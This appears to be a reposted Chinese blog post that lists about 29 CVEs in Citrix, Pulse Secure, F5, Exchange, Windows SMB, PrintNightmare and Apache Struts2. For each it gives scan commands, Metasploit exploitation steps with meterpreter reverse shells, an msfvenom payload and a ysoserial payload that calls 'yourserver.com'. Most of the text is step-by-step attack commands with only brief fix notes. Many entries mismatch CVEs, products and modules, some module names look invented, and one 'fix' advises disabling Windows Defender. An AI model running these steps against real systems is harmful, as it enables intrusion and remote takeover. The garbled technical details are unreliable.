百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术资源 > 正文

msf提权漏洞利用最全总结

moboyou 2025-04-10 23:05 27 浏览

最近在重构安全体系,顺带对msf可以利用的漏洞进行了一些总结,喜欢我的朋友请关注并收藏。


2.2.2.1CVE-2019-19781 Citrix漏洞

(1)漏洞检测或者扫描方法:

使用Nmap或Metasploit的citrix_enum模块进行扫描。

# 使用Nmap扫描

nmap -p 80,443

# 使用Metasploit模块

use auxiliary/scanner/http/citrix_enum

set RHOSTS

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的citrix_adc_cve_2019_19781模块进行利用。

use exploit/linux/http/citrix_adc_cve_2019_19781

set RPORT 443

set TARGETURI /vpn/

set USERNAME

set PASSWORD

(3)详细的修复办法:

下载v11.1、v12.0以及v13.0版本的Citrix ADC和Gateway软件更新,或禁用易受攻击的目录遍历服务URL路径。

2.2.2.2CVE-2019-11510 Pulse Secure VPN漏洞

(1)使用Nmap扫描目标主机开放的443端口,也可以使用Metasploit的
http_pulsesecure_traversal模块进行扫描。

nmap --script ssl-heartbleed -p 443

use auxiliary/scanner/http/pulsesecure_traversal

(2)使用Metasploit的pulsesecure_cmd_exec模块进行利用。

use exploit/linux/http/pulsesecure_cmd_exec

set SSL true

set TARGETURI /dana-na/../vpns/portal/scripts/newbm.pl

(3)漏洞修复

使用Pulse Secure发布的最新软件更新修补此漏洞,还需同时修改密码和密钥,以增强安全性。

2.2.2.3CVE-2020-5902 F5 BIG-IP漏洞

(1)使用Nmap扫描目标主机开放的443端口,也可以使用Metasploit的http_f5_bigip_check模块进行扫描。

# 使用Nmap扫描

nmap -p 443 --script http-vuln-cve2020-5902

# 使用Metasploit模块

use auxiliary/scanner/http/http_f5_bigip_check

set RHOSTS

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的f5_bigip_tmsh_rce模块进行利用。

use exploit/unix/http/f5_bigip_tmsh_rce

set RHOSTS

set RPORT 443

set TARGETURI /tmsh/tmshCmd.jsp

run

(3)详细的修复办法:

立即升级到最新版本的BIG-IP软件,最新版本中包含了对此漏洞的修补。

2.2.2.4CVE-2021-21972 VMware vSphere Client漏洞

使用Nmap扫描目标主机,检查TCP 443端口是否开放。也可以使用Metasploit的vmware_vcenter_login模块进行扫描。

# 使用Nmap扫描

nmap -p 443 --script http-vuln-cve2021-22986

# 使用Metasploit模块

use auxiliary/scanner/http/f5_bigip_cookie

set RHOSTS

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的f5_bigip_restapi_rce模块进行利用。

use exploit/linux/http/f5_bigip_restapi_rce

set RHOSTS

set TARGETURI /mgmt/tm/util/bash

set PASSWORD

set USERNAME

run

(3)详细的修复办法:

立即升级F5 BIG-IP软件的最新版本,另外,管理员还要加强密码策略和网络安全设置。

2.2.2.5CVE-2021-26855 Exchange漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机,检查TCP 443端口是否开放。也可以使用Metasploit的http_enum模块进行扫描。

# 使用Nmap扫描

nmap -p 443 --script ssl-heartbleed

# 使用Metasploit模块

use auxiliary/scanner/http/http_enum

set RHOSTS

set RPORT 443

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
microsoft_exchange_server_proxylogon模块进行利用。

use exploit/windows/http/microsoft_exchange_server_proxylogon

set RHOSTS

set USERNAME

set PASSWORD

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

(3)详细的修复办法:

立即升级Exchange软件的最新版本,或使用Microsoft发布的补丁来修复此漏洞。

2.2.2.6CVE-2020-1472 ZeroLogon漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机开放的SMB服务端口,如果开放了445或139端口,则可能存在此漏洞。也可以使用Metasploit中的smb_version模块进行扫描。

# 使用Nmap扫描

nmap -p 445,139 --script smb-vuln-ms17-010

# 使用Metasploit模块

use auxiliary/scanner/smb/smb_version

set RHOSTS

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的cve_2020_1472_zerologon模块进行利用。

use exploit/windows/smb/cve_2020_1472_zerologon

set RHOSTS

set SMBDomain

set SMBUser

set SMBPass

run

(3)详细的修复办法:

使用Microsoft发布的补丁修复此漏洞,或者将DCs升级到最新版本。

2.2.2.7CVE-2021-34527 PrintNightmare漏洞

(1)漏洞检测或者扫描方法:

使用PowerShell脚本进行检测:

Get-SmbShare | ForEach-Object { Get-Acl $_.Name | ForEach-Object { $_.Access } } | Where-Object IdentityReference -match 'Everyone|BUILTIN\\Users' | Select-Object FileSystemRights, IdentityReference, AccessControlType, IsInherited | Format-List

使用Microsoft提供的补丁测试工具进行漏洞检测:

# Windows Server 2019/Windows 10 Version 1809 or later

.\RPT-Test.exe -Target -UntrustedFile \\path\to\payload.dll

# Windows Server 2012/Windows 8 through earlier versions

.\RPT-Test.exe -Target -UntrustedFile \\path\to\payload.dll -VerifySignature 0

(2)漏洞详细利用方法及步骤参考:

使用PowerShell脚本进行利用:

$code = @'

using System;

using System.Runtime.InteropServices;


public class HelloWorld {

public static void Main() {

string cmd = "calc.exe";

NativeMethods.WinExec(cmd, 0);

}

}


internal static class NativeMethods {

[DllImport("kernel32")]

public static extern int WinExec(string cmd, int nCmdShow);

}

'@

Add-Type $code

[HelloWorld]::Main()

使用Metasploit的windows/local/ntprint_smb模块进行利用:

use exploit/windows/local/ntprint_smb

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST

set RHOSTS

run

(3)详细的修复办法:

Microsoft已经发布了安全更新程序,建议用户尽快升级到最新版并关闭Windows打印机共享服务。此外,也可以通过策略或命令行的方式禁用Windows打印机共享服务,或者限制用户对打印机共享的访问来减少攻击面。

2.2.2.8 CVE-2021-21985 vSphere Client漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的
vmware_vcenter_upload_file模块进行扫描。

# 使用Nmap扫描

nmap -p 443 --script http-vuln-cve2021-21985

# 使用Metasploit模块

use auxiliary/scanner/http/vmware_vcenter_upload_file

set RHOSTS

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的vmware_vcenter_server_rce模块进行利用。

use exploit/linux/http/vmware_vcenter_server_rce

set RHOSTS

set USERNAME

set PASSWORD

run

(3)详细的修复办法:

VMware官方发布了vCenter Server 6.7 U3j、7.0 U2c和7.0 Update 2e版本的更新程序来修复此漏洞,管理员可以下载并安装最新版本的软件来修补此漏洞。

2.2.2.9 CVE-2021-31166 IIS漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机的HTTP服务,也可以使用Metasploit的
http_iis_webdav_upload_asp模块进行扫描。

# 使用Nmap扫描

nmap -p80 --script http-vuln-cve2021-31166

# 使用Metasploit模块

use exploit/windows/http/iis_webdav_upload_asp

set RHOSTS

set RPORT 80

set SSL false

set TARGETURI /webdav/test.txt

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的http_iis_webdav_payload模块进行利用。

use exploit/windows/http/iis_webdav_payload

set RHOSTS

set VHOST

set LHOST

run

(3)详细的修复办法:

下载并安装最新版本的IIS软件更新来修补此漏洞,或者在服务器上禁用WebDAV协议。

2.2.2.10 CVE-2021-1636 Windows Defender漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了Windows Defender的远程管理端口5985,也可以使用Metasploit的
windows/local/ms-windefender-bypass模块进行扫描。

# 使用Nmap扫描

nmap -p 5985

# 使用Metasploit模块

use exploit/windows/local/ms-windefender-bypass

set LPORT

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
windows/local/ms-windefender-bypass-exe模块进行利用。

use exploit/windows/local/ms-windefender-bypass-exe

set LHOST

set LPORT

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

(3)详细的修复办法:

立即安装微软发布的最新累积更新,或者手动禁用Windows Defender。

2.2.2.11 CVE-2021-22893 Fortinet SSL VPN漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了Fortinet SSL VPN的HTTPS服务,也可以使用Metasploit的http_fortinet_upload_exec模块进行扫描。

# 使用Nmap扫描

nmap -p 443 --script ssl-heartbleed

# 使用Metasploit模块

use auxiliary/scanner/http/fortinet_upload_exec

set RHOSTS

set RPORT 443

set SSL true

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
fortinet_sslvpn_webauth_form_cmd_exec模块进行利用。

use exploit/windows/http/fortinet_sslvpn_webauth_form_cmd_exec

set RHOSTS

set RPORT 443

set TARGETURI /remote/login?lang=en

set SSL true

run

(3)详细的修复办法:

将Fortinet SSL VPN升级到最新版本并检查配置是否正确,确保安装了所有推荐的组件和补丁。

CVE-2021-21972 vSphere Client漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的
vmware_vcenter_cve_2021_21972模块进行扫描。

# 使用Nmap扫描

nmap -p 443 --script http-vuln-cve2021-21972

# 使用Metasploit模块

use auxiliary/scanner/http/vmware_vcenter_cve_2021_21972

set RHOSTS

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
vmware_vcenter_js_fckeditor模块进行利用。

use exploit/linux/http/vmware_vcenter_js_fckeditor

set RHOSTS

set TARGETURI /fckeditor/editor/filemanager/connectors/test.html

run

(3)详细的修复办法:

立即升级vCenter Server,vSphere Client和ESXi软件,或者使用VMware发布的补丁并重新部署系统。

2.2.2.12 CVE-2021-21979 vCenter Server漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的
vmware_vcenter_cve_2021_21979模块进行扫描。

# 使用Nmap扫描

nmap -p 443 --script http-vuln-cve2021-21979

# 使用Metasploit模块

use auxiliary/scanner/http/vmware_vcenter_cve_2021_21979

set RHOSTS

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
vmware_vcenter_server_appliance_rce模块进行利用。

use exploit/linux/http/vmware_vcenter_server_appliance_rce

set RHOSTS

set TARGETURI /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil.getDiagnosticFileContents=1?path=/var/log/vmware/vsan-health/*

run

(3)详细的修复办法:

下载并安装VMware发布的最新版本的软件更新,或者使用VMware发布的补丁修复此漏洞。

2.2.2.13 CVE-2021-22879 SonicWall VPN漏洞

1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了SonicWall VPN的HTTP端口,也可以使用Metasploit的http_sonicwall_sslvpntest模块进行扫描。

# 使用Nmap扫描

nmap -p 443,8443 --script http-vuln-cve2021-20016

# 使用Metasploit模块

use auxiliary/scanner/http/sonicwall_sslvpntest

set RHOSTS

set RPORT 443

set SSL true

run

2)漏洞详细利用方法及步骤参考:

使用Metasploit的sonicwall_netextender_rce模块进行利用。

use exploit/linux/http/sonicwall_netextender_rce

set RHOSTS

set RPORT 443

set SSL true

run

3)详细的修复办法:

下载并安装最新版本的SonicWall NetExtender客户端,或者升级到最新版本的SonicWall SMA和Firewall软件。

2.2.2.14 CVE-2017-0144 EternalBlue漏洞

(1)漏洞检测或者扫描方法:

使用Nmap进行端口扫描,或使用Metasploit的ms17_010_eternalblue模块进行扫描。

使用Nmap扫描

nmap -sV --script smb-vuln-ms17-010

使用Metasploit模块

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS

set SMBPIPE

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的windows/shell/reverse_tcp模块进行反向Shell连接。

use exploit/multi/handler

set PAYLOAD windows/shell/reverse_tcp

set LHOST

set LPORT

run

(3)详细的修复办法:

立即安装微软发布的最新安全更新或累积更新,或禁用不必要的SMBv1协议。

2.2.2.15 CVE-2019-18935 Citrix ADC漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否存在Citrix ADC,或使用Citrix提供的cxcheck.c脚本进行单个主机扫描。

使用Nmap扫描

nmap -p 80,443

使用cxcheck.c脚本进行单个主机扫描

gcc cxcheck.c -lpthread -o cxcheck

./cxcheck

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
citrix_adc_cve_2019_19781_directory_traversal模块进行利用。

use auxiliary/scanner/http/citrix_adc_cve_2019_19781_directory_traversal

set RHOSTS

set SRVHOST

run

(3)详细的修复办法:

下载并安装Citrix发布的安全更新补丁,或通过网络隔离等措施进行防范。

2.2.2.16CVE-2020-14750 Oracle WebLogic Server漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否存在Oracle WebLogic Server,或使用Metasploit的http_weblogic_ssrf_exec模块进行扫描。

使用Nmap扫描

nmap -p 7001,7002 --script=oracle-tns-version

使用Metasploit模块

use exploit/multi/http/weblogic_ssrf

set RHOSTS

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/weblogic_ssrf_advise_poc模块进行利用。

use exploit/multi/http/weblogic_ssrf_advise_poc

set RHOSTS

run

(3)详细的修复办法:

下载并安装Oracle发布的最新安全更新补丁,或通过网络隔离等措施进行防范,如配置WebLogic防火墙、禁用未使用的组件等措施。同时,建议实现强身份验证,并将系统域名与其他软件绑定在一起以保护WebLogic服务器,避免利用URL入侵漏洞。

2.2.2.17 CVE-2020-0796 SMBv3 Ghost漏洞

(1)漏洞检测或者扫描方法:

使用Nmap进行端口扫描,或使用Metasploit的smb2_compression_zero模块进行扫描。

使用Nmap扫描

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-cve2020-0796

使用Metasploit模块

use auxiliary/scanner/smb/smb2_compression_zero

set RHOSTS

set RPORT 445

run

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
windows/smb/smbv3_client_reliable_dialect_leak模块进行利用。

use exploit/windows/smb/smbv3_client_reliable_dialect_leak

set RHOSTS

set SMBPIPE

run

(3)详细的修复办法:

尽快安装微软发布的补丁,禁用不必要的SMBv3协议或进行防火墙限制,以及限制网络流量从外部接入。

2.2.2.18 Shiro反序列化漏洞(CVE-2020-13933)

(1)漏洞检测或扫描方法:

使用ysoserial工具生成payload,发送到目标Shiro服务器并观察是否触发了漏洞。

使用ysoserial工具生成payload

java -jar ysoserial.jar CommonsCollections1 "curl yourserver.com/xxx"|base64

发送payload到目标服务器并观察是否触发漏洞

(2)漏洞详细利用方法及步骤参考:

使用msfvenom生成payload,然后使用Metasploit的
multi/http/shiro_default_password_exec模块进行利用。

使用msfvenom生成payload

msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT= -o payload.bin

使用Metasploit的模块进行攻击

use exploit/multi/http/shiro_default_password_exec

set RHOSTS

set TARGETURI /xxx

set PAYLOADFILE payload.bin

run

(3)详细的修复办法:

升级Apache Shiro版本,禁止使用未授权的功能。

2.2.2.19 Struts2-032远程代码执行漏洞(CVE-2016-3087)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2

使用Struts2-Scan脚本

python struts-pwn.py -u http:///index.action -c "command"

struts-pwn:https://github.com/mazen160/struts-pwn

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts2_code_exec_showcase模块进行利用。

use exploit/multi/http/struts2_code_exec_showcase

set RHOSTS

set TARGETURI /struts2-showcase/

run

(3)详细的修复办法:

升级至最新版本的Struts2,禁用不必要的功能,过滤用户输入数据。

2.2.2.20 Struts2-045远程代码执行漏洞(CVE-2017-5638)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -sV --script http-vuln-cve2017-5638

使用Struts2-Scan脚本

python struts-pwn-CVE-2017-5638.py -u http:///index.action -c "command"

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts2_content_type_ognl模块进行利用。

use exploit/multi/http/struts2_content_type_ognl

set RHOSTS

set TARGETURI /struts2-showcase/

run

(3)详细的修复办法:

升级至最新版本的Struts2,限制上传文件类型,加强日志监控。

2.2.2.21 Struts2-053远程代码执行漏洞(CVE-2017-5638)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -sV --script http-vuln-cve2017-5638

使用Struts2-Scan脚本

python struts-pwn_CVE-2017-5638.py -u http:///index.action -c "command"

Struts2-Scan:https://github.com/lazym0nk3y/Struts2-Scan

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts2_content_type_ognl模块进行利用。

use exploit/multi/http/struts2_content_type_ognl

set RHOSTS

set TARGETURI /struts2-showcase/

run

(3)详细的修复办法:

升级至最新版本的Struts2,限制上传文件类型,加强日志监控。

2.2.2.22 Struts2-061远程代码执行漏洞(CVE-2020-17530)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -sV --script http-vuln-cve2020-17530

使用Struts2-Scan脚本

python3 Struts2_061_scanner.py -u http:/// -c "touch hack.txt"

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/linux/http/struts2_namespace_ognl模块进行利用。

use exploit/linux/http/struts2_namespace_ognl

set RHOSTS

set TARGETURI /struts2-showcase/

run

(3)详细的修复办法:

升级至最新版本的Struts2,加强输入校验和过滤,限制系统命名空间。

2.2.2.23 Struts2-016远程代码执行漏洞(CVE-2013-2251)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2

使用Struts2-Scan脚本

python struts-pwn-CVE-2013-2251.py -u http:///index.action -c "command"

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts_code_exec_class模块进行利用。

use exploit/multi/http/struts_code_exec_class

set RHOSTS

set TARGETURI /struts2-showcase/example/HelloWorld.action

set CMD

run

(3)详细的修复办法:

升级至最新版本的Struts2,限制访问权限和用户输入数据,加强异常处理。

2.2.2.24 Struts2-037远程代码执行漏洞(CVE-2016-3081)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2

使用Struts2-Scan脚本

python struts-pwn-CVE-2016-3081.py -u http:///struts2-showcase/index.action -c "command"

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts_dmi_exec模块进行利用。

use exploit/multi/http/struts_dmi_exec

set RHOSTS

set TARGETURI /struts2-showcase/

run

(3)详细的修复办法:

升级至最新版本的Struts2,禁用不必要的功能,过滤用户输入数据。此漏洞也可以通过在web.xml文件中配置一个安全过滤器来修复。

2.2.2.25 Struts2-052远程代码执行漏洞(CVE-2017-9805)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2

使用Struts2-Scan脚本

python struts-pwn-CVE-2017-9805.py -u http:///struts2-showcase/index.action -c "command"

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts2_rest_xstream模块进行利用。

use exploit/multi/http/struts2_rest_xstream

set RHOSTS

set TARGETURI /struts2-rest-showcase/orders/

run

(3)详细的修复办法:

升级至最新版本的Struts2,禁用不必要的功能,过滤用户输入数据,限制访问权限。此漏洞也可以通过在web.xml文件中配置一个安全过滤器来修复。

2.2.2.26Struts2-013远程命令执行漏洞(CVE-2013-1966)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2

使用Struts2-Scan脚本

python struts-pwn.py -u http:///index.action -c "command"

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts_exec_namespace_ognl模块进行利用。

use exploit/multi/http/struts_exec_namespace_ognl

set RHOSTS

set TARGETURI /struts/

run

(3)详细的修复办法:

升级至最新版本的Struts2,限制访问权限和用户输入数据,加强异常处理。同时,建议在web.xml文件中配置一个安全过滤器来缓解此漏洞的影响。

2.2.2.27 Struts2-033远程命令执行漏洞(CVE-2016-3081)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2

使用Struts2-Scan脚本

python struts-pwn-CVE-2016-3081.py -u http:///struts2-showcase/index.action -c "command"

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts_code_exec_showcase模块进行利用。

use exploit/multi/http/struts_code_exec_showcase

set RHOSTS

set TARGETURI /struts2-showcase/

run

(3)详细的修复办法:

升级至最新版本的Struts2,加强用户输入数据的过滤和异常处理,限制访问权限。另外,建议在web.xml文件中配置安全过滤器来缓解此漏洞的影响。

2.2.2.28 Struts2-057远程代码执行漏洞(CVE-2018-11776)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2

使用Struts2-Scan脚本

python struts-pwn-CVE-2018-11776.py -u http:///index.action

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts2_namespace_ognl模块进行利用。

use exploit/multi/http/struts2_namespace_ognl

set RHOSTS

set TARGETURI /struts/

run

(3)详细的修复办法:

升级至最新版本的Struts2,加强用户输入数据的过滤和异常处理,限制访问权限。另外,建议在web.xml文件中配置安全过滤器来缓解此漏洞的影响。

2.2.2.29 Struts2-devmode远程代码执行漏洞

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2

使用Struts2-Scan脚本

python struts-pwn-devmode.py -u http:///struts2-showcase/ -c "command"

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的
exploit/multi/http/struts2_dev_mode模块进行利用。

use exploit/multi/http/struts2_dev_mode

set RHOSTS

set TARGETURI /struts2-showcase/

run

(3)详细的修复办法:

升级至最新版本的Struts2,加强用户输入数据的过滤和异常处理,限制访问权限。另外,建议关闭devMode或限制只有特定IP地址能够访问。

喜欢的朋友请关注并收藏,另外也可以关注我的公众号《小兵搞安全》。

相关推荐

Excel技巧:SHEETSNA函数一键提取所有工作表名称批量生产目录

首先介绍一下此函数:SHEETSNAME函数用于获取工作表的名称,有三个可选参数。语法:=SHEETSNAME([参照区域],[结果方向],[工作表范围])(参照区域,可选。给出参照,只返回参照单元格...

Excel HOUR函数:“小时”提取器_excel+hour函数提取器怎么用

一、函数概述HOUR函数是Excel中用于提取时间值小时部分的日期时间函数,返回0(12:00AM)到23(11:00PM)之间的整数。该函数在时间数据分析、考勤统计、日程安排等场景中应用广泛。语...

Filter+Search信息管理不再难|多条件|模糊查找|Excel函数应用

原创版权所有介绍一个信息管理系统,要求可以实现:多条件、模糊查找,手动输入的内容能去空格。先看效果,如下图动画演示这样的一个效果要怎样实现呢?本文所用函数有Filter和Search。先用filter...

FILTER函数介绍及经典用法12:FILTER+切片器的应用

EXCEL函数技巧:FILTER经典用法12。FILTER+切片器制作筛选按钮。FILTER的函数的经典用法12是用FILTER的函数和切片器制作一个筛选按钮。像左边的原始数据,右边想要制作一...

office办公应用网站推荐_office办公软件大全

以下是针对Office办公应用(Word/Excel/PPT等)的免费学习网站推荐,涵盖官方教程、综合平台及垂直领域资源,适合不同学习需求:一、官方权威资源1.微软Office官方培训...

WPS/Excel职场办公最常用的60个函数大全(含卡片),效率翻倍!

办公最常用的60个函数大全:从入门到精通,效率翻倍!在职场中,WPS/Excel几乎是每个人都离不开的工具,而函数则是其灵魂。掌握常用的函数,不仅能大幅提升工作效率,还能让你在数据处理、报表分析、自动...

收藏|查找神器Xlookup全集|一篇就够|Excel函数|图解教程

原创版权所有全程图解,方便阅读,内容比较多,请先收藏!Xlookup是Vlookup的升级函数,解决了Vlookup的所有缺点,可以完全取代Vlookup,学完本文后你将可以应对所有的查找难题,内容...

批量查询快递总耗时?用Excel这个公式,自动计算揽收到签收天数

批量查询快递总耗时?用Excel这个公式,自动计算揽收到签收天数在电商运营、物流对账等工作中,经常需要统计快递“揽收到签收”的耗时——比如判断某快递公司是否符合“3天内送达”的服务承...

Excel函数公式教程(490个实例详解)

Excel函数公式教程(490个实例详解)管理层的财务人员为什么那么厉害?就是因为他们精通excel技能!财务人员在日常工作中,经常会用到Excel财务函数公式,比如财务报表分析、工资核算、库存管理等...

Excel(WPS表格)Tocol函数应用技巧案例解读,建议收藏备用!

工作中,经常需要从多个单元格区域中提取唯一值,如体育赛事报名信息中提取唯一的参赛者信息等,此时如果复制粘贴然后去重,效率就会很低。如果能合理利用Tocol函数,将会极大地提高工作效率。一、功能及语法结...

Excel中的SCAN函数公式,把计算过程理清,你就会了

Excel新版本里面,除了出现非常好用的xlookup,Filter公式之外,还更新一批自定义函数,可以像写代码一样写公式其中SCAN函数公式,也非常强大,它是一个循环函数,今天来了解这个函数公式的计...

Excel(WPS表格)中多列去重就用Tocol+Unique组合函数,简单高效

在数据的分析和处理中,“去重”一直是绕不开的话题,如果单列去重,可以使用Unique函数完成,如果多列去重,如下图:从数据信息中可以看到,每位参赛者参加了多项运动,如果想知道去重后的参赛者有多少人,该...

Excel(WPS表格)函数Groupby,聚合统计,快速提高效率!

在前期的内容中,我们讲了很多的统计函数,如Sum系列、Average系列、Count系列、Rank系列等等……但如果用一个函数实现类似数据透视表的功能,就必须用Groupby函数,按指定字段进行聚合汇...

Excel新版本,IFS函数公式,太强大了!

我们举一个工作实例,现在需要计算业务员的奖励数据,右边是公司的奖励标准:在新版本的函数公式出来之前,我们需要使用IF函数公式来解决1、IF函数公式IF函数公式由三个参数组成,IF(判断条件,对的时候返...

Excel不用函数公式数据透视表,1秒完成多列项目汇总统计

如何将这里的多组数据进行汇总统计?每组数据当中一列是不同菜品,另一列就是该菜品的销售数量。如何进行汇总统计得到所有的菜品销售数量的求和、技术、平均、最大、最小值等数据?不用函数公式和数据透视表,一秒就...